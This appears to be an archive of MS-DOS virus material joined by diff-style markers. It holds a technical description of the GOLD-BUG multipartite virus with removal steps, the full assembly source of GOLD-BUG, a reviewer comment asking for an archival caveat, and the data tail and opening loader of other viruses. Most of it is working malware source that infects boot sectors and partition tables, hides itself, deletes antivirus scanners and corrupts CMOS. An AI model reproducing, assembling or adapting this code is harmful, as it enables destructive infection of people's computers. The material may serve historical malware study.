DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30
DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12
DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5
DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2
DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0
DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25
DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21
DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25
DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46
DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0
DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46
DW 33,15,-33,44,18,-14,44,21,7,35,24,25
DW 19,26,37,0,29,40,-17,31,34,-29,34,21
DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25
DW 3,43,-23,12,45,-17,16,46,-8,15,47,0
DW 11,48,5,5,49,7,0,49,6,0,49,2
DW 0,49,0,2,49,0,6,49,0,7,49,5
DW 5,48,11,0,47,15,-8,46,16,-17,45,12
DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30
DW 5,36,-33,21,34,-29,34,31,-17,40,29,0
DW 37,26,19,25,24,35,7,21,44,-14,18,44
DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29
DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29
DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44
DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0
DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30
DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12
DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5
DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2
DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0
DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25
DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21
DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25
DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46
DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0
patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27
db 31,35,40,45,50,56,61,67,73,80,86,93
mess db 'HARD HIT & HEAVY HATE the HUMANS !!'
db ' [ H.H.& H.H. the H. ] '
drt dw 5 dup (0)
memory:
CODE ENDS
END START
@@ -0,0 +1,161 @@
Virus Name: GOLD-BUG
Aliases: AU, GOLD, GOLD-FEVER, GOLD-MINE
V Status: New, Research
Discovery: January, 1994
Symptoms: CMOS checksum failure; Creates files with no extension; Modem
answers on 7th ring; BSC but it is hidden; Most virus scanners
fail to run or are Deleted; CHKLIST.??? files deleted.
Origin: USA
Eff Length: 1,024 Bytes
Type Code: SBERaRbReX - Spawning Color Video Resident and Extended HMA
Memory Resident Boot-Sector and Master-Sector Infector
Detection Method: None
Removal Instructions: See Below
General Comments:
GOLD-BUG is a memory-resident multipartite polymorphic stealthing
boot-sector spawning anti-antivirus virus that works with DOS 5 and
DOS 6 in the HIMEM.SYS memory. When an .EXE program infected with the
GOLD-BUG virus is run, it determines if it is running on an 80186 or
better, if not it will terminate and not install. If it is on an
80186 or better it will copy itself to the partition table of the hard
disk and remain resident in memory in the HMA (High Memory Area) only
if the HMA is available, ie. DOS=HIGH in the CONFIG.SYS file else no
infection will occur. The old partition table is moved to sector 14
and the remainder of the virus code is copied to sector 13. The virus
then executes the spawned associated file if present. INT 13 and
INT 2F are hooked into at this time but not INT 21. The spawning
feature of this virus is not active now.
When the computer is rebooted, the virus goes memory resident in the
color video memory. Also at this time the GOLD-BUG virus removes
itself from the partition table and restores the old one back. Unlike
other boot-sector infectors, it does not use the top of memory to
store the code. CHKDSK does not show a decrease in available memory.
At this time it only hooks INT 10 and monitors when the HMA becomes
available. Once DOS moves into the HMA, then GOLD-BUG moves into the
HMA at address FFFF:FB00 to FFFF:FFFF. If the HMA never becomes
available, ie. DOS loaded LOW or the F5 key hit in DOS 6 to bypass the
CONFIG.SYS, then the virus clears itself from the system memory when
the computer changes into graphics mode. If it moves to the HMA, it
hooks INT 13, INT 21 and INT 2F and then rewrites itself back to the
partition table. The GOLD-BUG virus also has some code that stays
resident in the interrupt vector table to always make the HMA
available to the virus. The full features of the virus are now
active.
The GOLD-BUG virus will infect the boot sector of 1.2M diskettes.
The virus copies itself to the boot sector of the diskette and moves
a copy of the boot sector to sector 28 and the remainder of the code
is copied to sector 27. These are the last 2 sectors of the 1.2M disk
root directory. If there are file entries on sector 27 or 28 it will
not overwrite them with the virus code. It will infect 1.2M disks in
drive A: or B: If a clean boot disk is booted from drive A: and you
try to access C: you will get an invalid drive specification.
The boot-sector infection is somewhat unique. If the computer is
booted with a disk that contains the GOLD-BUG virus, it will remain in
video memory until the HMA is available and then infect the hard disk.
Also at this time, it will remove itself from the 1.2M disk. The
virus will never infect this disk again. It makes tracking where you
got the virus from difficult in that your original infected disk is
not infected anymore.
If an .EXE file less than 64K and greater then 1.5K is executed,
GOLD-BUG will randomly decide to spawn a copy of it. The .EXE file is
renamed to the same file name with no extension, ie. CHKDSK.EXE
becomes CHKDSK. The original file attributes are then changed to
SYSTEM. An .EXE file with the same name is created. This .EXE file
has the same length, file date and attributes as the original .EXE
file. This spawning process will not make a copy on a diskette
because it might be write protected and be detected; but it will make
a spawn .EXE file on a network drive. When a spawned file is created,
CHKLIST.??? of the current directory is also deleted. The .EXE file
that is created is actually a .COM file; it has no .EXE header.
The GOLD-BUG virus is very specific as to what type of .EXE files it
will spawn copies. It will not spawn any Windows .EXE files or any
other .EXE files the use the new extended .EXE header except those
that use the PKLITE extended .EXE header. This way all Windows
programs will continue to run and the virus will still be undetected.
The GOLD-BUG virus is also Polymorphic. Each .EXE file it creates
only has 2 bytes that remain constant. It can mutate into 128
different decription patterns. It uses a double decription technique
that involves INT 3 that makes it very difficult to decript using a
debugger. The assembly code allowed for 512 different front-end
decripters. Each of these can mutate 128 different ways.
The GOLD-BUG virus incorporates an extensive steathing technique. Any
time the hard disk partition table or boot sector of an infected
diskette is examined, the copy of the partition table or boot sector
is returned. If a spawned .EXE file is opened to be read or executed;
the GOLD-BUG virus will redirect to the original file. Windows 3.1
will detect a resident boot-sector virus if the "Use 32 Bit Access" is
enabled on the "Virtual Memory" option. GOLD-BUG will disconnect
itself from the INT 13 chain when Windows installs and reconnect when
Windows uninstalles to avoid being detected. When Windows starts, the
GOLD-BUG virus will copy the original hard disk partition table back.
When Windows ends, the GOLD-BUG virus will reinfect the partition
table.
The GOLD-BUG virus also has an extensive anti-antivirus routine. It
can install itself with programs like VSAFE.COM and DISKMON.EXE
resident that monitor changes to the computer that are common for
viruses. It writes to the disk using the original BIOS INT 13 and not
the INT 13 chain that these types of programs have hooked into. It
hooks into the bottom of the interrupt chain rather than changing and
hooking interrupts; very similar to the tunneling technique. If the
GOLD-BUG virus is resident in memory, any attempts to run most virus
scanners will be aborted. GOLD-BUG stops any large .EXE file
(greater than 64k) with the last two letters of "AN" to "AZ". It will
stop SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE, TNTAV.EXE,
etc., etc. The SCAN program will either be deleted or an execution
error will return. Also, GOLD-BUG will cause a CMOS checksum failure
to happen next time the system boots. GOLD-BUG also erases
"CHKLIST.???" created by CPAV.EXE and MSAV.EXE. Programs that do an
internal checksum on themselves will not detect any changes. The
Thunder Byte Antivirus programs contain a partition table program that
claims it can detect all partition table viruses. GOLD-BUG rides
right through the ThunderByte partition virus checker.
The GOLD-BUG virus detects a modem. If you received an incoming call
on the modem line, GOLD-BUG will output a string that will set the
modem to answer on the seventh ring.
If a program tries to erase the infected .EXE file, the original
program and not the infected .EXE file is erased.
The text strings "AU", "1O7=0SLMTA", and "CHKLIST????" appear in the
decripted code. The virus gets it name from "AU", the chemical
element "GOLD". The text string "CHKLIST????" is actually executable
code.
The GOLD-BUG virus has two companion viruses that it works with. The
DA'BOYS virus is also a boot-sector infector. It is possible to have
a diskette with two boot-sector viruses. GOLD-BUG hides the presence
of the DA'BOYS virus from the Windows 3.1 startup routine. GOLD-BUG
removes the DA'BOYS virus from the INT 13 chain at the start of
Windows and restores it when Windows ends. The GOLD-BUG virus works
with the XYZ virus; it reserves the space FFFF:F900 to FFFF:FAFF in
the HMA for the XYZ virus so it can load as well.
To remove the GOLD-BUG virus, change DOS=HIGH to DOS=LOW in the
CONFIG.SYS, then reboot. Once the system comes up again, reboot from
a clean boot disk. The Virus has now removed itself from the
partition table and memory. With the ATTRIB command check for files
with the SYSTEM bit set that don't have any extension. Delete the
.EXE file associated with the SYSTEM file. Using ATTRIB remove the
SYSTEM attribute. Rename the file with no extension to an .EXE file.
Format each diskette or run SYS to remove the virus from the boot
sector of each 1.2M disk. Any spawned .EXE files copied to diskette
need to be deleted.
Several variations of this virus can exist. The assembly code allowed
for 14 features to be turned on or off: Delete Scanners, Check for
8088, Infect at Random, Deflect Delete, CMOS Bomb, File Reading
Stealth, Same File Date, Double Decription, Execute Spawned, Modem
Code, Anti-Antivirus, Polymorphic, Multipartite and 720K or 1.2M
Diskette Infection. Some of these features can be disabled and more
code added to change the characteristics of this virus.
@@ -0,0 +1,683 @@
cseg segment para public 'code'
gold_bug proc near
assume cs:cseg
;-----------------------------------------------------------------------------
;designed by "Q" the misanthrope.
;-----------------------------------------------------------------------------
.186
TRUE equ 001h
FALSE equ 000h
;-----------------------------------------------------------------------------
;option bytes used and where
DELETE_SCANNERS equ FALSE ; -2 bytes -2 in com_code
CHECK_FOR_8088 equ TRUE ; 4 bytes 4 in com_code
INFECT_RANDOM equ TRUE ; 4 bytes 4 in com_code
CMOS_BOMB equ TRUE ; 4 bytes 4 in com_code
DEFLECT_DELETE equ TRUE ; 5 bytes 5 in com_code
READING_STEALTH equ TRUE ; 5 bytes 5 in com_code
SAME_FILE_DATE equ TRUE ; 24 bytes 24 in com_code
DOUBLE_DECRYPT equ TRUE ; 26 bytes 26 in com_code
EXECUTE_SPAWNED equ TRUE ; 35 bytes 32 in com_code 3 in boot_code
MODEM_CODE equ TRUE ; 40 bytes 29 in com_code 11 in boot_code
ANTI_ANTIVIRUS equ TRUE ; 46 bytes 35 in com_code 11 in boot_code
POLYMORPHIC equ TRUE ; 90 bytes 74 in com_code 16 in boot_code
MULTIPARTITE equ TRUE ;372 bytes 346 in com_code 26 in boot_code
;-----------------------------------------------------------------------------
;floppy boot infection
FLOPPY_1_2M equ 001h
FLOPPY_760K equ 000h
FLOPPY_TYPE equ FLOPPY_1_2M
;-----------------------------------------------------------------------------
IFE MULTIPARTITE
DELETE_SCANNERS equ FALSE
CHECK_FOR_8088 equ FALSE
INFECT_RANDOM equ FALSE
DEFLECT_DELETE equ FALSE
READING_STEALTH equ FALSE
SAME_FILE_DATE equ FALSE
EXECUTE_SPAWNED equ FALSE
POLYMORPHIC equ FALSE
ENDIF
;-----------------------------------------------------------------------------
SECTOR_SIZE equ 00200h
RES_OFFSET equ 0fb00h
COM_OFFSET equ 00100h
RELATIVE_OFFSET equ RES_OFFSET-COM_OFFSET
PART_OFFSET equ COM_OFFSET+SECTOR_SIZE
BOOT_OFFSET equ 07c00h
RELATIVE_BOOT equ BOOT_OFFSET-PART_OFFSET
LOW_JMP_10 equ 0031ch
LOW_JMP_21 equ 00321h
SAVE_INT_CHAIN equ 0032ch
SCRATCH_AREA equ 08000h
HEADER_SEGMENT equ 00034h
INT_21_IS_NOW equ 0cch
BIOS_INT_13 equ 0c6h
NEW_INT_13_LOOP equ 0cdh
BOOT_SECTOR equ 001h
DESCRIPTOR_OFF equ 015h
IF FLOPPY_TYPE EQ FLOPPY_1_2M
DESCRIPTOR equ 0f909h
OLD_BOOT_SECTOR equ 00eh
COM_CODE_SECTOR equ 00dh
ELSE
DESCRIPTOR equ 0f905h
OLD_BOOT_SECTOR equ 005h
COM_CODE_SECTOR equ 004h
ENDIF
READ_ONLY equ 001h
SYSTEM equ 004h
DELTA_RI equ 004h
DSR equ 020h
CTS equ 010h
CD equ 080h
FAR_JUMP equ 0eah
MIN_FILE_SIZE equ 00500h
PSP_SIZE equ 00100h
VIRGIN_INT_13_A equ 00806h
VIRGIN_INT_13_B equ 007b4h
VIRGIN_INT_2F equ 00706h
FAR_JUMP_OFFSET equ 006h
SET_INT_OFFSET equ 007h
CHANGE_SEG_OFF equ 009h
VIDEO_MODE equ 00449h
MONOCHROME equ 007h
COLOR_VIDEO_MEM equ 0b000h
ADDR_MUL equ 004h
SINGLE_BYTE_INT equ 003h
VIDEO_INT equ 010h
VIDEO_INT_ADDR equ VIDEO_INT*ADDR_MUL
DISK_INT equ 013h
DISK_INT_ADDR equ DISK_INT*ADDR_MUL
SERIAL_INT equ 014h
DOS_INT equ 021h
DOS_INT_ADDR equ DOS_INT*ADDR_MUL
MULTIPLEX_INT equ 02fh
COMMAND_LINE equ 080h
FIRST_FCB equ 05ch
SECOND_FCB equ 06ch
NULL equ 00000h
GET_PORT_STATUS equ 00300h
WRITE_TO_PORT equ 00100h
HD_0_HEAD_0 equ 00080h
READ_A_SECTOR equ 00201h
WRITE_A_SECTOR equ 00301h
GET equ 000h
SET equ 001h
DELETE_W_FCB equ 01300h
DEFAULT_DRIVE equ 000h
GET_DEFAULT_DR equ 01900h
DOS_SET_INT equ 02500h
FILE_DATE_TIME equ 05700h
DENYNONE equ 040h
OPEN_W_HANDLE equ 03d00h
READ_W_HANDLE equ 03f00h
WRITE_W_HANDLE equ 04000h
CLOSE_HANDLE equ 03e00h
UNLINK equ 04100h
FILE_ATTRIBUTES equ 04300h
RESIZE_MEMORY equ 04a00h
QUERY_FREE_HMA equ 04a01h
ALLOCATE_HMA equ 04a02h
EXEC_PROGRAM equ 04b00h
GET_ERROR_LEVEL equ 04d00h
TERMINATE_W_ERR equ 04c00h
RENAME_A_FILE equ 05600h
LSEEK_TO_END equ 04202h
CREATE_NEW_FILE equ 05b00h
RESIDENT_LENGTH equ 068h
PARAMETER_TABLE equ 005f1h
MAX_PATH_LENGTH equ 00080h
EXE_HEADER_SIZE equ 020h
NEW_EXE_HEADER equ 00040h
NEW_EXE_OFFSET equ 018h
PKLITE_SIGN equ 'KP'
PKLITE_OFFSET equ 01eh
NO_OF_COM_PORTS equ 004h
WINDOWS_BEGIN equ 01605h
WINDOWS_END equ 01606h
ERROR_IN_EXE equ 0000bh
IF POLYMORPHIC
FILE_SIGNATURE equ 07081h
XOR_SWAP_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+TWO_BYTES
FILE_LEN_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+THREE_BYTES
FIRST_UNDO_OFF equ byte ptr ((offset first_jmp)-(offset com_code)+ONE_BYTE)
SECOND_UNDO_OFF equ byte ptr ((offset second_jmp)-(offset com_code))
BL_BX_OFFSET equ byte ptr ((offset incbl_incbx)-(offset com_code))
ROTATED_OFFSET equ byte ptr ((offset rotated_code)-(offset com_code))
ELSE
FILE_SIGNATURE equ 0070eh
ENDIF
IF MODEM_CODE
STRING_LENGTH equ byte ptr ((offset partition_sig)-(offset string))
ENDIF
IF EXECUTE_SPAWNED
EXEC_SUBTRACT equ byte ptr ((offset file_name)-(offset exec_table))
ENDIF
DH_OFFSET equ byte ptr ((offset dh_value )-(offset initialize_boot)+TWO_BYTES)
ONE_NIBBLE equ 004h
ONE_BYTE equ 001h
TWO_BYTES equ 002h
THREE_BYTES equ 003h
FOUR_BYTES equ 004h
FIVE_BYTES equ 005h
FIVE_BITS equ 005h
EIGHT_BYTES equ 008h
USING_HARD_DISK equ 080h
KEEP_CF_INTACT equ 002h
CMOS_CRC_ERROR equ 02eh
CMOS_PORT equ 070h
REMOVE_NOP equ 001h
CR equ 00dh
LF equ 00ah
INT3_INCBX equ 043cch
INC_BL equ 0c3feh
INCBX_INCBL_XOR equ INT3_INCBX XOR INC_BL
JMP_NO_SIGN equ 079h
JMP_NOT_ZERO equ 075h
JNS_JNZ_XOR equ JMP_NO_SIGN XOR JMP_NOT_ZERO
CLI_PUSHCS equ 00efah
;-----------------------------------------------------------------------------
video_seg segment at 0c000h
org 00000h
original_int_10 label word
video_seg ends
;-----------------------------------------------------------------------------
io_seg segment at 00070h
org 00893h
original_2f_jmp label word
io_seg ends
;-----------------------------------------------------------------------------
org COM_OFFSET
com_code:
;-----------------------------------------------------------------------------
IF POLYMORPHIC
first_decode proc near
serial_number: xor word ptr ds:[si+bx+FIRST_UNDO_OFF],MIN_FILE_SIZE
org $-REMOVE_NOP
org $-FIVE_BYTES
jmp load_it
org $+TWO_BYTES
rotated_code: int SINGLE_BYTE_INT
into
adc al,0d4h
incbl_incbx: inc bl
first_jmp: jnz serial_number
add bx,si
jns serial_number
first_decode endp
;-----------------------------------------------------------------------------
IF DOUBLE_DECRYPT
second_decode proc near
push si
get_next_byte: lodsw
add bx,ax
inc bx
xor byte ptr ds:[si+SECOND_UNDO_OFF],bl
org $-REMOVE_NOP
dec si
second_jmp: jns get_next_byte
pop si
second_decode endp
ENDIF
ENDIF
;-----------------------------------------------------------------------------
com_start proc near
IF MULTIPARTITE
push cs
pop es
call full_move_w_si
mov ds,cx
cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL]
jne dont_set_int
mov di,VIRGIN_INT_13_B
call set_both_ints
push cs
pop es
ENDIF
dont_set_int: IF CHECK_FOR_8088
mov cl,RESIDENT_LENGTH
mov al,high(RESIZE_MEMORY)
shl ax,cl
mov bx,cx
int DOS_INT
ELSEIF MULTIPARTITE
mov bx,RESIDENT_LENGTH
mov ah,high(RESIZE_MEMORY)
int DOS_INT
ENDIF
IF EXECUTE_SPAWNED
pusha
call from_com_code+RELATIVE_OFFSET
popa
push cs
pop ds
push cs
pop es
cmpsw
mov dx,si
sub si,EXEC_SUBTRACT
org $-REMOVE_NOP
mov bx,PARAMETER_TABLE
mov di,bx
mov ax,EXEC_PROGRAM
set_table: scasw
movsb
scasb
mov word ptr ds:[di],ds
je set_table
int DOS_INT
mov ah,high(GET_ERROR_LEVEL)
int DOS_INT
mov ah,high(TERMINATE_W_ERR)
ELSEIF MULTIPARTITE
call from_com_code+RELATIVE_OFFSET
mov ax,TERMINATE_W_ERR
ENDIF
IF MULTIPARTITE
int DOS_INT
ELSE
jmp boot_load
ENDIF
com_start endp
;-----------------------------------------------------------------------------
high_code proc near
mov dx,offset int_10_start+RELATIVE_OFFSET
mov bx,LOW_JMP_10-FAR_JUMP_OFFSET
call set_int_10_21
mov bx,VIDEO_INT_ADDR-SET_INT_OFFSET
low_code: mov es,cx
mov cl,OLD_BOOT_SECTOR
mov dx,LOW_JMP_10
call set_interrupt
mov bx,BOOT_OFFSET
pop dx
int DISK_INT
xor dh,dh
mov cl,BOOT_SECTOR
mov ax,WRITE_A_SECTOR
high_code endp
;-----------------------------------------------------------------------------
interrupt_13 proc far
int_13_start: IF MULTIPARTITE
mov byte ptr cs:[drive_letter+ONE_BYTE+RELATIVE_OFFSET],dl
ENDIF
cmp cx,BOOT_SECTOR
jne no_boot_sector
cmp ah,high(READ_A_SECTOR)
jne no_boot_sector
cmp dx,HD_0_HEAD_0
jbe reread_boot
no_boot_sector: int NEW_INT_13_LOOP
jmp short return_far
reread_boot: int NEW_INT_13_LOOP
jc return_far
pusha
push ds
push es
pop ds
check_old_boot: mov ax,READ_A_SECTOR
xor dh,dh
mov cl,OLD_BOOT_SECTOR
IF ANTI_ANTIVIRUS
cmp word ptr ds:[bx],'HC'
ELSE
cmp word ptr ds:[bx],CLI_PUSHCS
ENDIF
je read_old_boot
test dl,USING_HARD_DISK
jnz encode_hd
cmp word ptr ds:[bx+DESCRIPTOR_OFF-ONE_BYTE],DESCRIPTOR
jne time_to_leave
mov dh,al
pusha
int NEW_INT_13_LOOP
cmp byte ptr ds:[bx],ch
popa
pushf
pusha
xor dh,dh
mov cl,al
int NEW_INT_13_LOOP
popa
popf
jne time_to_leave
encode_hd: mov ah,high(WRITE_A_SECTOR)
push ax
int NEW_INT_13_LOOP
pop ax
jc time_to_leave
mov di,bx
call move_code
mov cl,COM_CODE_SECTOR
IF POLYMORPHIC
xor byte ptr ds:[bx+XOR_SWAP_OFFSET],dh
org $-REMOVE_NOP
jo dont_flip_it
xchg word ptr ds:[bx+ROTATED_OFFSET],ax
org $-REMOVE_NOP
xchg ah,al
xchg word ptr ds:[bx+ROTATED_OFFSET+TWO_BYTES],ax
org $-REMOVE_NOP
xchg word ptr ds:[bx+ROTATED_OFFSET],ax
org $-REMOVE_NOP
ENDIF
dont_flip_it: pusha
int NEW_INT_13_LOOP
popa
mov di,bx
call move_some_more
mov byte ptr ds:[bx+DH_OFFSET],dh
org $-REMOVE_NOP
mov dh,cl
inc cx
int NEW_INT_13_LOOP
jmp short check_old_boot
read_old_boot: mov dh,byte ptr ds:[bx+DH_OFFSET]
org $-REMOVE_NOP
int NEW_INT_13_LOOP
time_to_leave: pop ds
popa
clc
return_far: retf KEEP_CF_INTACT
interrupt_13 endp
;-----------------------------------------------------------------------------
interrupt_2f proc far
pusha
push ds
push es
push offset return_to_2f+RELATIVE_OFFSET
xor cx,cx
mov ds,cx
mov bx,SAVE_INT_CHAIN-SET_INT_OFFSET
cmp ax,WINDOWS_END
jne try_another
les dx,dword ptr ds:[bx+SET_INT_OFFSET]
jmp short set_13_chain
try_another: cmp ax,WINDOWS_BEGIN
jne another_return
mov di,VIRGIN_INT_13_B
call get_n_set_int+ONE_BYTE
les dx,dword ptr ds:[BIOS_INT_13*ADDR_MUL]
set_13_chain: mov ax,READ_A_SECTOR
call get_set_part
mov bx,VIRGIN_INT_13_B-SET_INT_OFFSET
call set_interrupt
mov bl,low(VIRGIN_INT_13_A-SET_INT_OFFSET)
call set_interrupt
mov ah,high(WRITE_A_SECTOR)
interrupt_2f endp
;-----------------------------------------------------------------------------
get_set_part proc near
pusha
push es
mov bx,SCRATCH_AREA
mov es,bx
mov dx,HD_0_HEAD_0
inc cx
int NEW_INT_13_LOOP
mov ax,READ_A_SECTOR
int DISK_INT
pop es
popa
another_return: ret
get_set_part endp
;-----------------------------------------------------------------------------
return_to_2f proc near
pop es
pop ds
popa
jmp far ptr original_2f_jmp
return_to_2f endp
;-----------------------------------------------------------------------------
interrupt_10 proc far
int_10_start: pushf
pusha
push ds
push es
push offset a_return+RELATIVE_OFFSET
from_com_code: xor bx,bx
mov ds,bx
or ah,ah
jz set_10_back
mov ax,QUERY_FREE_HMA
int MULTIPLEX_INT
cmp bh,high(MIN_FILE_SIZE+SECTOR_SIZE)
jb another_return
mov ax,ALLOCATE_HMA
int MULTIPLEX_INT
clc
call full_move_w_di
mov dx,offset int_13_start+RELATIVE_OFFSET
call set_13_chain
mov bx,VIRGIN_INT_2F-SET_INT_OFFSET
mov dx,offset interrupt_2f+RELATIVE_OFFSET
call set_interrupt
cmp word ptr ds:[LOW_JMP_10],cx
je set_10_back
push es
push es
mov di,DOS_INT_ADDR
mov bx,INT_21_IS_NOW*ADDR_MUL-SET_INT_OFFSET
call get_n_set_int+ONE_BYTE
pop ds
mov bx,offset old_int_10_21-SET_INT_OFFSET+RELATIVE_OFFSET+ONE_BYTE
call set_interrupt
mov ds,cx
mov ax,DOS_SET_INT+DOS_INT
mov dx,LOW_JMP_21
int INT_21_IS_NOW
pop es
mov bx,dx
mov dx,offset interrupt_21+RELATIVE_OFFSET
mov word ptr ds:[bx],0b450h
mov word ptr ds:[bx+TWO_BYTES],0cd19h
mov word ptr ds:[bx+FOUR_BYTES],05800h+INT_21_IS_NOW
call set_int_10_21
set_10_back: mov di,offset old_int_10_21+RELATIVE_OFFSET+ONE_BYTE
mov bx,LOW_JMP_10-FAR_JUMP_OFFSET
interrupt_10 endp
;-----------------------------------------------------------------------------
get_n_set_int proc near
les dx,dword ptr cs:[di]
jmp short set_interrupt
set_int_10_21: mov byte ptr ds:[bx+FAR_JUMP_OFFSET],FAR_JUMP
set_interrupt: mov word ptr ds:[bx+SET_INT_OFFSET],dx
mov word ptr ds:[bx+CHANGE_SEG_OFF],es
ret
get_n_set_int endp
;-----------------------------------------------------------------------------
IF MULTIPARTITE
set_both_ints proc near
mov bx,(NEW_INT_13_LOOP*ADDR_MUL)-SET_INT_OFFSET
call get_n_set_int+ONE_BYTE
mov bl,low(BIOS_INT_13*ADDR_MUL)-SET_INT_OFFSET
jmp short set_interrupt
set_both_ints endp
ENDIF
;-----------------------------------------------------------------------------
IF EXECUTE_SPAWNED
exec_table db COMMAND_LINE,FIRST_FCB,SECOND_FCB
ENDIF
;-----------------------------------------------------------------------------
IF MODEM_CODE
org PART_OFFSET+001f3h
string db CR,'1O7=0SLMTA'
ENDIF
;-----------------------------------------------------------------------------
org PART_OFFSET+SECTOR_SIZE-TWO_BYTES
partition_sig dw 0aa55h
;-----------------------------------------------------------------------------
org PART_OFFSET+SECTOR_SIZE+TWO_BYTES
file_name db 'DA',027h,'BOYS.COM',NULL
;-----------------------------------------------------------------------------
org PARAMETER_TABLE
dw NULL,NULL,NULL,NULL,NULL,NULL,NULL
db NULL
;-----------------------------------------------------------------------------
IFE MULTIPARTITE
boot_load proc near
push cs
pop es
call full_move_w_si
mov ds,cx
cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL]
jne dont_set_intcd
lds dx,dword ptr ds:[VIRGIN_INT_13_B]
mov ax,DOS_SET_INT+NEW_INT_13_LOOP
int DOS_INT
dont_set_intcd: mov ah,high(GET_DEFAULT_DR)
int DOS_INT
call from_com_code+RELATIVE_OFFSET
mov ax,TERMINATE_W_ERR
int DOS_INT
boot_load endp
ENDIF
;-----------------------------------------------------------------------------
IF POLYMORPHIC
load_it proc near
mov word ptr ds:[si],FILE_SIGNATURE
mov byte ptr ds:[si+TWO_BYTES],FIRST_UNDO_OFF
push bx
xor ax,ax
cli
out 043h,al
in al,040h
mov ah,al
in al,040h
sti
push ax
and ax,0001eh
mov bx,ax
mov ax,word ptr ds:[bx+two_byte_table]
mov word ptr ds:[si+ROTATED_OFFSET+TWO_BYTES],ax
org $-REMOVE_NOP
pop ax
and ax,003e0h
mov cl,FIVE_BITS
shr ax,cl
mov bx,ax
mov al,byte ptr ds:[bx+one_byte_table]
xor al,low(INC_BL)
mov byte ptr ds:[swap_incbx_bl+THREE_BYTES],al
pop bx
jmp com_start
load_it endp
;-----------------------------------------------------------------------------
two_byte_table: mov al,0b2h
xor al,0b4h
and al,0d4h
les ax,dword ptr ds:[si]
les cx,dword ptr ds:[si]
les bp,dword ptr ds:[si]
adc al,0d4h
and al,084h
adc al,084h
adc al,024h
add al,084h
add al,014h
add al,024h
test dl,ah
repz stc
repnz stc
;-----------------------------------------------------------------------------
one_byte_table: int SINGLE_BYTE_INT
into
daa
das
aaa
aas
inc ax
inc cx
inc dx
inc bp
inc di
dec ax
dec cx
dec dx
dec bp
dec di
nop
xchg ax,cx
xchg ax,dx
xchg ax,bp
xchg ax,di
cbw
cwd
lahf
scasb
scasw
xlat
repnz
repz
cmc
clc
stc
ENDIF
;-----------------------------------------------------------------------------
gold_bug endp
cseg ends
end com_code
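Review bot: The listing opens at `cseg segment para public 'code'` with no header identifying it as an archival malware sample, so a reader landing here from the corpus gets no provenance, no handling caveat, and no statement of which build configuration this text represents. Above `;designed by "Q" the misanthrope.` I would add `; GOLD-BUG (AU): retained for analysis only -- do not assemble or run outside an isolated, disposable system` and `; The variant is fixed by the option equates below (DELETE_SCANNERS .. MULTIPARTITE, FLOPPY_TYPE); record them alongside the sample hash`. The equates as given (`DELETE_SCANNERS equ FALSE`, `MULTIPARTITE equ TRUE`, `FLOPPY_TYPE equ FLOPPY_1_2M`, `RES_OFFSET equ 0fb00h`) agree with the companion description's HMA address and 1.2M floppy target but not with its claim that scanners get deleted, so this is presumably not the exact build that description was written from, and the header should say so rather than let the two be read as one sample. The `IFE MULTIPARTITE` block re-defines equates that were already assigned a value above it; whether an assembler accepts that is not established anywhere in the listing, so a note that only the MULTIPARTITE=TRUE configuration shown here is known to assemble would spare the next analyst a surprise.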
+900
@@ -0,0 +1,900 @@
CODE segment para public 'code'
assume cs:code,ds:code,es:nothing,ss:nothing
org 100h
egy equ 1 ; one
dma equ 0b0h
atvar equ 300 ; at paramaeter
xtvar equ 1 ; xt parameter
suruseg equ 255 ; density
idotartalek equ 18*30 ; time delay
start: db 0e9h,0,0
;##################### Initialization ######################
resid: push ax
mov cx,offset memory - offset begin ;#### decoding ####
mov bx,ds:[101h]
add bx,103h+(offset begin-offset resid)
jhg1: xor byte ptr [bx],0
inc bx
loop jhg1
begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin)
mov cs:[0feh],bx
mov ax,[bx+(offset eltarol-offset resid)]
mov cl,[bx+(offset eltarol-offset resid)+2]
mov ds:[100h],ax
mov ds:[102h],cl
mov cx,0b800h
mov ah,15
push bx
int 10h
pop bx
cmp al,7
jne rety
mov ch,0b0h
rety: mov [bx+(offset ruut - offset resid)+1],cx
mov word ptr [bx+(offset counter-offset resid)],idotartalek
mov byte ptr [bx+(offset jammed-offset resid)+1],al
mov byte ptr [bx+(offset vanesik-offset resid)],0
xor ax,ax
mov ds,ax
cmp word ptr ds:[130h],4142h
je zipp
mov ds:[130h],4142h
mov ax,cs
dec ax
mov ds,ax
mov ax,ds:[3]
sub ax,180h
mov ds:[3],ax
add ax,ds:[1]
mov es,ax
push cs
pop ds
sub word ptr ds:[2],384
mov di,3
mov si,bx
mov cx,(offset memory-offset resid) shr 1 +1
cld
rep movsw
mov ax,es
sub ax,10h
mov ds,ax
mov dx,offset irq
mov ax,251ch
int 21h
